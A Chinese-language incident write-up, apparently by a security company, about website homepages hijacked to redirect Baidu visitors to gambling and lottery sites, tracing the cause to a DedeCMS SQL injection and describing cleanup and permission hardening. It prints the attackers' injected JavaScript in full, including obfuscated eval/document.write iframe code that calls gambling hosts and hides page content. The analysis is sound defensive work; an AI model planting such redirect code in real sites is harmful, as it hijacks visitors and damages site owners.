网站首页被篡改,劫持百度跳转博彩网站怎么解决?



        大清早的一上班收到3个网站客户的QQ联系,说是自己公司的网站被跳转到了北京赛车,

彩票,赌博网站上去了,我们SINE安全公司对3个网站进行了详细的安全
检测,发现这3个客

户的网站都是同样的症状,网站首页文件
index.php,index.html都被篡改添加了恶意的代码。网

站在百度的快照也被更改成
了这些彩票,bo彩的内容了,并被百度网址安全中心提醒您:该站

点可能受到黑客
攻击,部分页面已被非法篡改!如下图所示:
 
 
从百度点击网站进去,会直接跳转到bo彩,赌博网站上去,直接输入3个公司的网
 
站地址是不会跳转的,点击跳转的时候会被360拦截掉,提示如下图:
 
360安全中心提醒您:未经证实的博彩赌博网站,您访问的网站含有未经证实的境外博彩或非法

赌博的相关内容,可能给您造成财产损失,请您谨慎访问。

 
我们SINE安全技术通过对3个客户网站的代码的安全分析,发现都被攻击者上传了网站木马后门,

php大马,以及一句话木马后门都被上传到了客户网站的根目录下
,网站的首页文件都被篡改了,

包括网站的标题,描述,TDK都被改成了bo彩,彩
票,赌博的内容,客户说之前还原了网站首页

文件,过不了多久还是被篡改,被跳
转,导致客户网站在百度的权重直接降权,网站在百度的关

键词排名都掉没了,损
失惨重。网站被反复篡改的原因根本是网站代码存在漏洞,需要对网站漏洞

进行修
复,以及做好网站安全加固,清除木马后门才能彻底的解决问题。
 
 
我们来看下网站首页被篡改的症状:
 
title keywords description都被篡改了,内容都是加密的字符:
 
<title>&#65279&#x5317&#x4eac&#36187&#x8f66&#112&#107&#49&#x30&#32&#8

0&#x
4b&#x31&#x30&#24320&#x5956&#x76f4&#25773&#x20&#21271&#20140&#x

8d5b&#3671
0&#112&#x6b&#49&#x30&#24320&#22870&#x8bb0&#24405&#45&#1

12&#107&#x31&#x30
&#x5f00&#22870&#35270&#39057&#30452&#25773</title>

 
通过url解密发现这些内容都是北京赛车,北京pk10,pk10北京PK开奖等彩票的网站关键词,简单

来讲就是网站的标题内容都被攻击者改成了彩票,bo彩的标题,利用
网站自身在百度的权重,做

他们自己的关键词排名。

 
 
网站被跳转的代码也被我们SINE安全技术找了出来,如下:
 
function goPAGE() {
    if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|
 
iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|
 
wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) {
        window.location.href = "https://www.rgcp66.com/?att=rgyh2"
    } else {
        var ss = '<center id="yangchen"><ifr' + 'ame scrolling="no" 
 
marginheight=0 marginwidth=0  frameborder="0" width="100%" width="14' + 
 
'00" height="8' + '50" src="https://www.rgcp77.com/?
 
att=rgyh8"></iframe></center>';
        eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');");
        try {
            setInterval(function() {
                try {
                    document.getElementById("div" + "All").style.display 
 
= "no" + "ne"
                } catch (e) {}
                for (var i = 0; i < document.body.children.length; i++) 
 
{
                    try {
                        var tagname = document.body.children[i].tagName;
                        var myid = document.body.children[i].id;
                        if (myid != "iconDiv1" && myid != "yangchen") {
                            document.body.children[i].style.display = 
 
"non" + "e"
                        }
                    } catch (e) {}
                }
            }, 100)
        } catch (e) {}
    }
}
goPAGE();
 
 
知道问题的所在,以及网站被攻击的症状,那么该如何解决问题?
 
 
首先登陆客户网站的服务器,打包压缩客户的网站代码下载到我们本地的工作电脑,对其进行详细

的安全检测,以及网站漏洞检测,网站木马后门检测,以及网站日
志下载分析,发现其中一个网站

使用的是dedecms系统开发网站,网站存在sql注入
漏洞,导致网站的管理员账号密码被sql注入获

取到,默认的管理员后台地址dede
没有改,导致攻击者直接登录后台上传了木马到网站里了。针

对dedecms的sql注入
漏洞进行了修复,清除掉网站存在的木马后门,对网站安全进行加固问题得

以解决
 
 
 
对dedecms的目录安全权限进行设置 /data目录取消脚本执行权限,给与写入权限,templets模

板文件夹也是同样的安全部署,取消php脚本的执行权限,开启写入
权限,dede后台的目录给

只读权限,uploads上传目录给写入,取消php脚本权限。

 
 
至此客户网站首页被篡改的问题得以解决,百度的拦截也是需要去除的,清除恶意链接代码,修

复网站漏洞,防止以后网站被篡改,做好网站安全后,再提交给百度
安全中心人工审核,就可以

解除百度的拦截,如果您对网站漏洞修复不熟悉的话,
可以找我们SINE安全来修复网站漏洞,解

决百度拦截。
分享: